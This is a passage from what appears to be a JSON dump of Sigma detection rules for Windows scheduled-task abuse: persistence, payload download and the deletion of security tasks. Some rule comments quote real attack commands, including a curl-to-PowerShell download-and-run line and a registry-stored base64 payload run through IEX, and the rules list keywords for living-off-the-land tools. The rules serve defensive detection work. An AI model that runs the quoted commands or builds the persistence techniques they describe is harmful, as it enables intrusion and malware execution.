SIGMA\n        ParentImage|contains|all:\n            - '\\AppData\\Local\\Temp\\'\n            - 'TeamViewer_.exe'\n        Image|endswith: '\\schtasks.exe'\n        CommandLine|contains: '/TN TVInstallRestore'\n    condition: selection and not filter\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_schtasks_change.yml",
    "content": "title: Suspicious Modification Of Scheduled Tasks\nid: 1c0e41cd-21bb-4433-9acc-4a2cd6367b9b\nrelated:\n    - id: 614cf376-6651-47c4-9dcc-6b9527f749f4 # Security-Audting Eventlog\n      type: similar\nstatus: test\ndescription: |\n    Detects when an attacker tries to modify an already existing scheduled tasks to run from a suspicious location\n    Attackers can create a simple looking task in order to avoid detection on creation as it's often the most focused on\n    Instead they modify the task after creation to include their malicious payload\nreferences:\n    - Internal Research\n    - https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/schtasks\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2022-07-28\nmodified: 2022-11-18\ntags:\n    - attack.privilege-escalation\n    - attack.persistence\n    - attack.execution\n    - attack.t1053.005\nlogsource:\n    product: windows\n    category: process_creation\ndetection:\n    selection_schtasks:\n        Image|endswith: '\\schtasks.exe'\n        CommandLine|contains|all:\n            - ' /Change '\n            - ' /TN '\n    selection_susp_locations:\n        CommandLine|contains:\n            - '\\AppData\\Local\\Temp'\n            - '\\AppData\\Roaming\\'\n            - '\\Users\\Public\\'\n            - '\\WINDOWS\\Temp\\'\n            - '\\Desktop\\'\n            - '\\Downloads\\'\n            - '\\Temporary Internet'\n            - 'C:\\ProgramData\\'\n            - 'C:\\Perflogs\\'\n            - '%ProgramData%'\n            - '%appdata%'\n            - '%comspec%'\n            - '%localappdata%'\n    selection_susp_images:\n        CommandLine|contains:\n            - 'regsvr32'\n            - 'rundll32'\n            - 'cmd /c '\n            - 'cmd /k '\n            - 'cmd /r '\n            - 'cmd.exe /c '\n            - 'cmd.exe /k '\n            - 'cmd.exe /r '\n            - 'powershell'\n            - 'mshta'\n            - 'wscript'\n            - 'cscript'\n            - 'certutil'\n            - 'bitsadmin'\n            - 'bash.exe'\n            - 'bash '\n            - 'scrcons'\n            - 'wmic '\n            - 'wmic.exe'\n            - 'forfiles'\n            - 'scriptrunner'\n            - 'hh.exe'\n            - 'hh '\n    condition: all of selection_*\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_schtasks_creation.yml",
    "content": "title: Scheduled Task Creation Via Schtasks.EXE\nid: 92626ddd-662c-49e3-ac59-f6535f12d189\nstatus: test\ndescription: Detects the creation of scheduled tasks by user accounts via the \"schtasks\" utility.\nreferences:\n    - https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/schtasks-create\nauthor: Florian Roth (Nextron Systems)\ndate: 2019-01-16\nmodified: 2025-10-22\ntags:\n    - attack.execution\n    - attack.persistence\n    - attack.privilege-escalation\n    - attack.t1053.005\n    - attack.s0111\n    - car.2013-08-001\n    - stp.1u\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        Image|endswith: '\\schtasks.exe'\n        CommandLine|contains: ' /create '\n    filter_main_system_user:\n        User|contains: # covers many language settings\n            - 'AUTHORI'\n            - 'AUTORI'\n    filter_optional_msoffice:\n        #  schtasks.exe /Create /tn \"Microsoft\\Office\\Office Performance Monitor\" /XML \"C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\Microsoft_Office_Office Performance Monitor.xml\"\n        ParentImage:\n            - 'C:\\Program Files\\Microsoft Office\\root\\integration\\integrator.exe'\n            - 'C:\\Program Files (x86)\\Microsoft Office\\root\\integration\\integrator.exe'\n        Image:\n            - 'C:\\Windows\\System32\\schtasks.exe'\n            - 'C:\\Windows\\SysWOW64\\schtasks.exe'\n        CommandLine|contains: 'Microsoft\\Office\\Office Performance Monitor'\n    condition: selection and not 1 of filter_main_* and not 1 of filter_optional_*\nfalsepositives:\n    - Administrative activity\n    - Software installation\nlevel: low\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_schtasks_creation_temp_folder.yml",
    "content": "title: Suspicious Scheduled Task Creation Involving Temp Folder\nid: 39019a4e-317f-4ce3-ae63-309a8c6b53c5\nstatus: test\ndescription: Detects the creation of scheduled tasks that involves a temporary folder and runs only once\nreferences:\n    - https://discuss.elastic.co/t/detection-and-response-for-hafnium-activity/266289/3\nauthor: Florian Roth (Nextron Systems)\ndate: 2021-03-11\nmodified: 2022-10-09\ntags:\n    - attack.privilege-escalation\n    - attack.execution\n    - attack.persistence\n    - attack.t1053.005\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        Image|endswith: '\\schtasks.exe'\n        CommandLine|contains|all:\n            - ' /create '\n            - ' /sc once '\n            - '\\Temp\\'\n    condition: selection\nfalsepositives:\n    - Administrative activity\n    - Software installation\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_schtasks_curl_and_powershell_combo.yml",
    "content": "title: Scheduled Task Creation with Curl and PowerShell Execution Combo\nid: 1d174d38-8fda-4081-a9b6-56d9763c0cd8\nstatus: experimental\ndescription: |\n    Detects the creation of a scheduled task using schtasks.exe, potentially in combination with curl for downloading payloads and PowerShell for executing them.\n    This facilitates executing malicious payloads or connecting with C&C server persistently without dropping the malware sample on the host.\nreferences:\n    - https://tria.ge/241015-l98snsyeje/behavioral2\nauthor: Swachchhanda Shrawan Poudel (Nextron Systems)\ndate: 2025-02-05\ntags:\n    - attack.privilege-escalation\n    - attack.execution\n    - attack.persistence\n    - attack.t1053.005\n    - attack.defense-evasion\n    - attack.t1218\n    - attack.command-and-control\n    - attack.t1105\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    # Example: cmd start /min /c schtasks /create /tn PolicyConverter /sc minute /mo 15 /tr \"conhost --headless cmd /v:on /c set a=https&set b=inh&set c=ostne&set d=tservice.co&set e=!a!://www.!b!!c!!d!m& curl -o - !e!/mscu/lokc.php?wl=HGNBWBGW**Admin | powershell\" /rl Highest\n    selection_img:\n        Image|endswith: '\\schtasks.exe'\n        CommandLine|contains|windash: ' /create '\n    selection_curl:\n        CommandLine|contains|all:\n            - 'curl '\n            - 'http'\n            - '-o'\n    selection_powershell:\n        CommandLine|contains: 'powershell'\n    condition: all of selection_*\nfalsepositives:\n    - Legitimate use of schtasks for administrative purposes.\n    - Automation scripts combining curl and PowerShell in controlled environments.\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_schtasks_delete.yml",
    "content": "title: Delete Important Scheduled Task\nid: dbc1f800-0fe0-4bc0-9c66-292c2abe3f78\nrelated:\n    - id: 9e3cb244-bdb8-4632-8c90-6079c8f4f16d # TaskScheduler EventLog\n      type: similar\n    - id: 7595ba94-cf3b-4471-aa03-4f6baa9e5fad # Security-Audting Eventlog\n      type: similar\nstatus: test\ndescription: Detects when adversaries stop services or processes by deleting their respective scheduled tasks in order to conduct data destructive activities\nreferences:\n    - Internal Research\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2022-09-09\ntags:\n    - attack.impact\n    - attack.t1489\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        Image|endswith: '\\schtasks.exe'\n        CommandLine|contains|all:\n            - '/delete'\n            - '/tn'\n        CommandLine|contains:\n            # Add more important tasks\n            - '\\Windows\\BitLocker'\n            - '\\Windows\\ExploitGuard'\n            - '\\Windows\\SystemRestore\\SR'\n            - '\\Windows\\UpdateOrchestrator\\'\n            - '\\Windows\\Windows Defender\\'\n            - '\\Windows\\WindowsBackup\\'\n            - '\\Windows\\WindowsUpdate\\'\n    condition: selection\nfalsepositives:\n    - Unlikely\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_schtasks_delete_all.yml",
    "content": "title: Delete All Scheduled Tasks\nid: 220457c1-1c9f-4c2e-afe6-9598926222c1\nstatus: test\ndescription: Detects the usage of schtasks with the delete flag and the asterisk symbol to delete all tasks from the schedule of the local computer, including tasks scheduled by other users.\nreferences:\n    - https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/schtasks-delete\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2022-09-09\ntags:\n    - attack.impact\n    - attack.t1489\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        Image|endswith: '\\schtasks.exe'\n        CommandLine|contains|all:\n            - ' /delete '\n            - '/tn \\*'\n            - ' /f'\n    condition: selection\nfalsepositives:\n    - Unlikely\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_schtasks_disable.yml",
    "content": "title: Disable Important Scheduled Task\nid: 9ac94dc8-9042-493c-ba45-3b5e7c86b980\nrelated:\n    - id: 7595ba94-cf3b-4471-aa03-4f6baa9e5fad # Security-Audting Eventlog\n      type: similar\nstatus: test\ndescription: Detects when adversaries stop services or processes by disabling their respective scheduled tasks in order to conduct data destructive activities\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1490/T1490.md#atomic-test-8---windows---disable-the-sr-scheduled-task\n    - https://twitter.com/MichalKoczwara/status/1553634816016498688\n    - https://thedfirreport.com/2021/10/18/icedid-to-xinglocker-ransomware-in-24-hours/\nauthor: frack113, Nasreddine Bencherchali (Nextron Systems), X__Junior\ndate: 2021-12-26\nmodified: 2024-08-25\ntags:\n    - attack.impact\n    - attack.t1489\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        Image|endswith: '\\schtasks.exe'\n        CommandLine|contains|all:\n            - '/Change'\n            - '/TN'\n            - '/disable'\n        CommandLine|contains:\n            # Add more important tasks\n            - '\\Windows\\BitLocker'\n            - '\\Windows\\ExploitGuard'\n            - '\\Windows\\ExploitGuard\\ExploitGuard MDM policy Refresh'\n            - '\\Windows\\SystemRestore\\SR'\n            - '\\Windows\\UpdateOrchestrator\\'\n            - '\\Windows\\Windows Defender\\'\n            - '\\Windows\\WindowsBackup\\'\n            - '\\Windows\\WindowsUpdate\\'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_schtasks_env_folder.yml",
    "content": "title: Schedule Task Creation From Env Variable Or Potentially Suspicious Path Via Schtasks.EXE\nid: 81325ce1-be01-4250-944f-b4789644556f\nrelated:\n    - id: 43f487f0-755f-4c2a-bce7-d6d2eec2fcf8 # TODO: Recreate after baseline\n      type: derived\nstatus: test\ndescription: Detects Schtask creations that point to a suspicious folder or an environment variable often used by malware\nreferences:\n    - https://www.welivesecurity.com/2022/01/18/donot-go-do-not-respawn/\n    - https://www.joesandbox.com/analysis/514608/0/html#324415FF7D8324231381BAD48A052F85DF04\n    - https://blog.talosintelligence.com/gophish-powerrat-dcrat/\nauthor: Florian Roth (Nextron Systems)\ndate: 2022-02-21\nmodified: 2025-10-07\ntags:\n    - attack.privilege-escalation\n    - attack.persistence\n    - attack.execution\n    - attack.t1053.005\nlogsource:\n    product: windows\n    category: process_creation\ndetection:\n    selection_1_create:\n        Image|endswith: '\\schtasks.exe'\n        CommandLine|contains|windash: ' /create '\n    selection_1_all_folders:\n        CommandLine|contains:\n            - ':\\Perflogs'\n            - ':\\Users\\All Users\\'\n            - ':\\Users\\Default\\'\n            - ':\\Users\\Public'\n            - ':\\Windows\\Temp'\n            - '\\AppData\\Local\\'\n            - '\\AppData\\Roaming\\'\n            - '%AppData%'\n            - '%Public%'\n    selection_2_parent:\n        ParentCommandLine|endswith: '\\svchost.exe -k netsvcs -p -s Schedule'\n    selection_2_some_folders:\n        CommandLine|contains:\n            - ':\\Perflogs'\n            - ':\\Windows\\Temp'\n            - '\\Users\\Public'\n            - '%Public%'\n    filter_optional_other:\n        - ParentCommandLine|contains: 'unattended.ini'\n        - CommandLine|contains: 'update_task.xml'\n    filter_optional_team_viewer:\n        CommandLine|contains: '/Create /TN TVInstallRestore /TR'\n    filter_optional_avira_install:\n        # Comment out this filter if you dont use AVIRA\n        CommandLine|contains|all:\n            - '/Create /Xml '\n            - '\\Temp\\.CR.'\n            - '\\Avira_Security_Installation.xml'\n    filter_optional_avira_other:\n        # Comment out this filter if you dont use AVIRA\n        CommandLine|contains|all:\n            - '/Create /F /TN'\n            - '/Xml '\n            - '\\Temp\\'\n            - 'Avira_'\n        CommandLine|contains:\n            - '.tmp\\UpdateFallbackTask.xml'\n            - '.tmp\\WatchdogServiceControlManagerTimeout.xml'\n            - '.tmp\\SystrayAutostart.xml'\n            - '.tmp\\MaintenanceTask.xml'\n    filter_optional_klite_codec:\n        CommandLine|contains|all:\n            - '\\Temp\\'\n            - '/Create /TN \"klcp_update\" /XML '\n            - '\\klcp_update_task.xml'\n    condition: ( all of selection_1_* or all of selection_2_* ) and not 1 of filter_optional_*\nfalsepositives:\n    - Benign scheduled tasks creations or executions that happen often during software installations\n    - Software that uses the AppData folder and scheduled tasks to update the software in the AppData folders\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_schtasks_folder_combos.yml",
    "content": "title: Schtasks From Suspicious Folders\nid: 8a8379b8-780b-4dbf-b1e9-31c8d112fefb\nstatus: test\ndescription: Detects scheduled task creations that have suspicious action command and folder combinations\nreferences:\n    - https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/lazarus-dream-job-chemical\nauthor: Florian Roth (Nextron Systems)\ndate: 2022-04-15\nmodified: 2022-11-18\ntags:\n    - attack.privilege-escalation\n    - attack.persistence\n    - attack.execution\n    - attack.t1053.005\nlogsource:\n    product: windows\n    category: process_creation\ndetection:\n    selection_img:\n        - Image|endswith: '\\schtasks.exe'\n        - OriginalFileName: 'schtasks.exe'\n    selection_create:\n        CommandLine|contains: ' /create '\n    selection_command:\n        CommandLine|contains:\n            - 'powershell'\n            - 'pwsh'\n            - 'cmd /c '\n            - 'cmd /k '\n            - 'cmd /r '\n            - 'cmd.exe /c '\n            - 'cmd.exe /k '\n            - 'cmd.exe /r '\n    selection_all_folders:\n        CommandLine|contains:\n            - 'C:\\ProgramData\\'\n            - '%ProgramData%'\n    condition: all of selection_*\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_schtasks_guid_task_name.yml",
    "content": "title: Suspicious Scheduled Task Name As GUID\nid: ff2fff64-4cd6-4a2b-ba7d-e28a30bbe66b\nstatus: test\ndescription: Detects creation of a scheduled task with a GUID like name\nreferences:\n    - https://thedfirreport.com/2022/10/31/follina-exploit-leads-to-domain-compromise/\n    - https://thedfirreport.com/2022/02/21/qbot-and-zerologon-lead-to-full-domain-compromise/\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2022-10-31\ntags:\n    - attack.privilege-escalation\n    - attack.persistence\n    - attack.execution\n    - attack.t1053.005\nlogsource:\n    product: windows\n    category: process_creation\ndetection:\n    selection_img:\n        Image|endswith: '\\schtasks.exe'\n        CommandLine|contains: '/Create '\n    selection_tn:\n        CommandLine|contains:\n            # Can start with single or double quote\n            - '/TN \"{'\n            - \"/TN '{\"\n            - \"/TN {\"\n    selection_end:\n        CommandLine|contains:\n            # Ending of the name to avoid possible FP in the rest of the commandline\n            - '}\"'\n            - \"}'\"\n            - '} '\n    condition: all of selection_*\nfalsepositives:\n    - Legitimate software naming their tasks as GUIDs\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_schtasks_one_time_only_midnight_task.yml",
    "content": "title: Uncommon One Time Only Scheduled Task At 00:00\nid: 970823b7-273b-460a-8afc-3a6811998529\nstatus: test\ndescription: Detects scheduled task creation events that include suspicious actions, and is run once at 00:00\nreferences:\n    - https://www.trendmicro.com/vinfo/us/security/news/ransomware-spotlight/ransomware-spotlight-blackbyte\nauthor: pH-T (Nextron Systems)\ndate: 2022-07-15\nmodified: 2023-02-03\ntags:\n    - attack.execution\n    - attack.persistence\n    - attack.privilege-escalation\n    - attack.t1053.005\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_img:\n        - Image|contains: '\\schtasks.exe'\n        - OriginalFileName: 'schtasks.exe'\n    selection_cli:\n        CommandLine|contains:\n            - 'wscript'\n            - 'vbscript'\n            - 'cscript'\n            - 'wmic '\n            - 'wmic.exe'\n            - 'regsvr32.exe'\n            - 'powershell'\n            - '\\AppData\\'\n    selection_time:\n        CommandLine|contains|all:\n            - 'once'\n            - '00:00'\n    condition: all of selection_*\nfalsepositives:\n    - Software installation\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_schtasks_openssh_tunnelling.yml",
    "content": "title: Potential SSH Tunnel Persistence Install Using A Scheduled Task\nid: 2daa93a0-a5fb-41c5-8cd8-3c11294bfd1f\nstatus: experimental\ndescription: Detects the creation of new scheduled tasks via commandline, using Schtasks.exe. This rule detects tasks creating that call OpenSSH, which may indicate the creation of reverse SSH tunnel to the attacker's server.\nreferences:\n    - https://thedfirreport.com/2023/10/30/netsupport-intrusion-results-in-domain-compromise/\n    - https://www.kroll.com/en/insights/publications/cyber/cactus-ransomware-prickly-new-variant-evades-detection\nauthor: Rory Duncan\ndate: 2025-07-14\ntags:\n    - attack.privilege-escalation\n    - attack.persistence\n    - attack.execution\n    - attack.t1053.005\n    - attack.command-and-control\nlogsource:\n    product: windows\n    category: process_creation\ndetection:\n    selection_img:\n        - Image|endswith: '\\schtasks.exe'\n        - OriginalFileName: 'schtasks.exe'\n    selection_cli_sshd:\n        CommandLine|contains|all:\n            - ' /create '\n            - 'sshd.exe'\n            - '-f'\n    selection_cli_ssh:\n        CommandLine|contains|all:\n            - ' /create '\n            - 'ssh.exe'\n            - '-i'\n    condition: selection_img and 1 of selection_cli_*\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_schtasks_persistence_windows_telemetry.yml",
    "content": "title: Potential Persistence Via Microsoft Compatibility Appraiser\nid: f548a603-c9f2-4c89-b511-b089f7e94549\nrelated:\n    - id: 73a883d0-0348-4be4-a8d8-51031c2564f8\n      type: derived\nstatus: test\ndescription: |\n    Detects manual execution of the \"Microsoft Compatibility Appraiser\" task via schtasks.\n    In order to trigger persistence stored in the \"\\AppCompatFlags\\TelemetryController\" registry key.\nreferences:\n    - https://www.trustedsec.com/blog/abusing-windows-telemetry-for-persistence/\nauthor: Sreeman\ndate: 2020-09-29\nmodified: 2023-02-10\ntags:\n    - attack.privilege-escalation\n    - attack.execution\n    - attack.persistence\n    - attack.t1053.005\nlogsource:\n    product: windows\n    category: process_creation\ndetection:\n    selection_img:\n        - Image|endswith: '\\schtasks.exe'\n        - OriginalFileName: 'schtasks.exe'\n    selection_cli:\n        CommandLine|contains|all:\n            - 'run '\n            - '\\Application Experience\\Microsoft Compatibility Appraiser'\n    condition: all of selection_*\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_schtasks_powershell_persistence.yml",
    "content": "title: Potential Persistence Via Powershell Search Order Hijacking - Task\nid: b66474aa-bd92-4333-a16c-298155b120df\nrelated:\n    - id: 6e8811ee-90ba-441e-8486-5653e68b2299\n      type: similar\nstatus: test\ndescription: Detects suspicious powershell execution via a schedule task where the command ends with an suspicious flags to hide the powershell instance instead of executeing scripts or commands. This could be a sign of persistence via PowerShell \"Get-Variable\" technique as seen being used in Colibri Loader\nreferences:\n    - https://blog.malwarebytes.com/threat-intelligence/2022/04/colibri-loader-combines-task-scheduler-and-powershell-in-clever-persistence-technique/\nauthor: pH-T (Nextron Systems), Florian Roth (Nextron Systems)\ndate: 2022-04-08\nmodified: 2023-02-03\ntags:\n    - attack.privilege-escalation\n    - attack.execution\n    - attack.persistence\n    - attack.t1053.005\n    - attack.t1059.001\nlogsource:\n    product: windows\n    category: process_creation\ndetection:\n    selection:\n        ParentImage: 'C:\\WINDOWS\\System32\\svchost.exe'\n        ParentCommandLine|contains|all:\n            - '-k netsvcs'\n            - '-s Schedule'\n        CommandLine|endswith:\n            - ' -windowstyle hidden'\n            - ' -w hidden'\n            - ' -ep bypass'\n            - ' -noni'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_schtasks_reg_loader.yml",
    "content": "title: Scheduled Task Executing Payload from Registry\nid: 86588b36-c6d3-465f-9cee-8f9093e07798\nrelated:\n    - id: c4eeeeae-89f4-43a7-8b48-8d1bdfa66c78\n      type: derived\nstatus: test\ndescription: Detects the creation of a schtasks that potentially executes a payload stored in the Windows Registry using PowerShell.\nreferences:\n    - https://thedfirreport.com/2022/02/21/qbot-and-zerologon-lead-to-full-domain-compromise/\nauthor: X__Junior (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)\ndate: 2023-07-18\ntags:\n    - attack.privilege-escalation\n    - attack.execution\n    - attack.persistence\n    - attack.t1053.005\n    - attack.t1059.001\nlogsource:\n    product: windows\n    category: process_creation\ndetection:\n    selection_img:\n        # schtasks.exe /Create /F /TN \"{97F2F70B-10D1-4447-A2F3-9B070C86E261}\" /TR \"cmd /c start /min \\\"\\\" powershell.exe -Command IEX([System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String((Get-ItemProperty -Path HKCU:\\SOFTWARE\\Pvoeooxf).yzbbvhhdypa))) \" /SC MINUTE /MO 30\n        - Image|endswith: '\\schtasks.exe'\n        - OriginalFileName: 'schtasks.exe'\n    selection_cli_create:\n        CommandLine|contains: '/Create'\n    selection_cli_get:\n        CommandLine|contains:\n            - 'Get-ItemProperty'\n            - ' gp ' # Alias\n    selection_cli_hive:\n        CommandLine|contains:\n            - 'HKCU:'\n            - 'HKLM:'\n            - 'registry::'\n            - 'HKEY_'\n    filter_main_encoding:\n        CommandLine|contains:\n            - 'FromBase64String'\n            - 'encodedcommand'\n    condition: all of selection_* and not 1 of filter_*\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_schtasks_reg_loader_encoded.yml",
    "content": "title: Scheduled Task Executing Encoded Payload from Registry\nid: c4eeeeae-89f4-43a7-8b48-8d1bdfa66c78\nstatus: test\ndescription: Detects the creation of a schtask that potentially executes a base64 encoded payload stored in the Windows Registry using PowerShell.\nreferences:\n    - https://thedfirreport.com/2022/02/21/qbot-and-zerologon-lead-to-full-domain-compromise/\nauthor: pH-T (Nextron Systems), @Kostastsale, TheDFIRReport, X__Junior (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)\ndate: 2022-02-12\nmodified: 2023-02-04\ntags:\n    - attack.privilege-escalation\n    - attack.execution\n    - attack.persistence\n    - attack.t1053.005\n    - attack.t1059.001\nlogsource:\n    product: windows\n    category: process_creation\ndetection:\n    selection_img:\n        # schtasks.exe /Create /F /TN \"{97F2F70B-10D1-4447-A2F3-9B070C86E261}\" /TR \"cmd /c start /min \\\"\\\" powershell.exe -Command IEX([System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String((Get-ItemProperty -Path HKCU:\\SOFTWARE\\Pvoeooxf).yzbbvhhdypa))) \" /SC MINUTE /MO 30\n        - Image|endswith: '\\schtasks.exe'\n        - OriginalFileName: 'schtasks.exe'\n    selection_cli_create:\n        CommandLine|contains: '/Create'\n    selection_cli_encoding:\n        CommandLine|contains:\n            - 'FromBase64String'\n            - 'encodedcommand'\n    selection_cli_get:\n        CommandLine|contains:\n            - 'Get-ItemProperty'\n            - ' gp ' # Alias\n    selection_cli_hive:\n        CommandLine|contains:\n            - 'HKCU:'\n            - 'HKLM:'\n            - 'registry::'\n            - 'HKEY_'\n    condition: all of selection_*\nfalsepositives:\n    - Unlikely\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_schtasks_schedule_type.yml",
    "content": "title: Suspicious Schtasks Schedule Types\nid: 24c8392b-aa3c-46b7-a545-43f71657fe98\nrelated:\n    - id: 7a02e22e-b885-4404-b38b-1ddc7e65258a\n      type: similar\nstatus: test\ndescription: Detects scheduled task creations or modification on a suspicious schedule type\nreferences:\n    - https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/schtasks-change\n    - https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/schtasks-create\n    - http://blog.talosintelligence.com/2022/09/lazarus-three-rats.html\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2022-09-09\ntags:\n    - attack.privilege-escalation\n    - attack.persistence\n    - attack.execution\n    - attack.t1053.005\nlogsource:\n    product: windows\n    category: process_creation\ndetection:\n    selection_img:\n        - Image|endswith: '\\schtasks.exe'\n        - OriginalFileName: 'schtasks.exe'\n    selection_time:\n        CommandLine|contains:\n            - ' ONLOGON '\n            - ' ONSTART '\n            - ' ONCE '\n            - ' ONIDLE '\n    filter_privs:\n        CommandLine|contains:\n            - 'NT AUT' # This covers the usual NT AUTHORITY\\SYSTEM\n            - ' SYSTEM' # SYSTEM is a valid value for schtasks hence it gets it's own value with space\n            - 'HIGHEST'\n    condition: all of selection_* and not 1 of filter_*\nfalsepositives:\n    - Legitimate processes that run at logon. Filter according to your environment\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_schtasks_schedule_type_system.yml",
    "content": "title: Suspicious Schtasks Schedule Type With High Privileges\nid: 7a02e22e-b885-4404-b38b-1ddc7e65258a\nrelated:\n    - id: 24c8392b-aa3c-46b7-a545-43f71657fe98\n      type: similar\nstatus: test\ndescription: Detects scheduled task creations or modification to be run with high privileges on a suspicious schedule type\nreferences:\n    - https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/schtasks-change\n    - https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/schtasks-create\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2022-08-31\ntags:\n    - attack.privilege-escalation\n    - attack.persistence\n    - attack.execution\n    - attack.t1053.005\nlogsource:\n    product: windows\n    category: process_creation\ndetection:\n    selection_img:\n        - Image|endswith: '\\schtasks.exe'\n        - OriginalFileName: 'schtasks.exe'\n    selection_time:\n        CommandLine|contains:\n            - ' ONLOGON '\n            - ' ONSTART '\n            - ' ONCE '\n            - ' ONIDLE '\n    selection_privs:\n        CommandLine|contains:\n            - 'NT AUT' # This covers the usual NT AUTHORITY\\SYSTEM\n            - ' SYSTEM' # SYSTEM is a valid value for schtasks hence it gets it's own value with space\n            - 'HIGHEST'\n    condition: all of selection_*\nfalsepositives:\n    - Some installers were seen using this method of creation unfortunately. Filter them in your environment\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_schtasks_schedule_via_masqueraded_xml_file.yml",
    "content": "title: Suspicious Scheduled Task Creation via Masqueraded XML File\nid: dd2a821e-3b07-4d3b-a9ac-929fe4c6ca0c\nstatus: test\ndescription: Detects the creation of a scheduled task using the \"-XML\" flag with a file without the '.xml' extension. This behavior could be indicative of potential defense evasion attempt during persistence\nreferences:\n    - https://learn.microsoft.com/en-us/windows/win32/taskschd/daily-trigger-example--xml-\n    - https://github.com/elastic/protections-artifacts/blob/084067123d3328a823b1c3fdde305b694275c794/behavior/rules/persistence_suspicious_scheduled_task_creation_via_masqueraded_xml_file.toml\nauthor: Swachchhanda Shrawan Poudel, Elastic (idea)\ndate: 2023-04-20\nmodified: 2024-12-01\ntags:\n    - attack.privilege-escalation\n    - attack.execution\n    - attack.defense-evasion\n    - attack.persistence\n    - attack.t1036.005\n    - attack.t1053.005\nlogsource:\n    product: windows\n    category: process_creation\ndetection:\n    selection_img:\n        - Image|endswith: '\\schtasks.exe'\n        - OriginalFileName: 'schtasks.exe'\n    selection_cli_create:\n        CommandLine|contains:\n            - '/create'\n            - '-create'\n    selection_cli_xml:\n        CommandLine|contains:\n            - '/xml'\n            - '-xml'\n    filter_main_extension_xml:\n        CommandLine|contains: '.xml'\n    filter_main_system_process:\n        IntegrityLevel:\n            - 'System'\n            - 'S-1-16-16384'\n    filter_main_rundll32:\n        ParentImage|endswith: '\\rundll32.exe'\n        ParentCommandLine|contains|all:\n            - ':\\WINDOWS\\Installer\\MSI'\n            - '.tmp,zzzzInvokeManagedCustomActionOutOfProc'\n    filter_optional_third_party:\n        ParentImage|endswith:\n            # Consider removing any tools that you don't use to avoid blind spots\n            - ':\\ProgramData\\OEM\\UpgradeTool\\CareCenter_*\\BUnzip\\Setup_msi.exe'\n            - ':\\Program Files\\Axis Communications\\AXIS Camera Station\\SetupActions.exe'\n            - ':\\Program Files\\Axis Communications\\AXIS Device Manager\\AdmSetupActions.exe'\n            - ':\\Program Files (x86)\\Zemana\\AntiMalware\\AntiMalware.exe'\n            - ':\\Program Files\\Dell\\SupportAssist\\pcdrcui.exe'\n    condition: all of selection_* and not 1 of filter_main_* and not 1 of filter_optional_*\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_schtasks_susp_pattern.yml",
